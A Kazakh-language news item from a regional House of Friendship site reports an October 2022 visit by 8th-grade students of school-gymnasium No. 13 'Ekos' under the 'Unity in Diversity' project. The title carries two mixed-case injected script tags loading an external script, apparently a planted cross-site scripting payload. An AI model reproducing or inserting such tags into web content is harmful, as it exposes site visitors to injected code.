«Әралуандылықтағы бірлік» жобасы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

21.10.2022

Ағымдағы жылдың 19 қазан күні «Әралуандылықтағы бірлік» жобасын жүзеге асыру аясында,№ 13 «Экос» мектеп-гимназиясының 8 сынып оқушылары облыстық Достық үйіне шолу экскурсиясымен келді.

Қонақтар этномәдени бірлестіктердің кабинеттеріне барып, Ақмола облысында тұратын түрлі этностардың тұрмысымен, мәдениетімен, салт-дәстүрлерімен танысты. Мұнда оларға этномәдени бірлестіктердің ана тілін сақтау және дамыту бойынша қандай жұмыстар атқаратыны, өздерінің ұлттық мерекелері мен фестивальдерін қалай ұйымдастыратыны туралы айтылды. Сондай-ақ оқушыларға Достық үйінің қабырғасында жұмыс атқаратын тіл мектептері туралы ақпараттар берілді.

Просмотров: 398


Пікір қосу



Деректерді қолтаңбаға қосу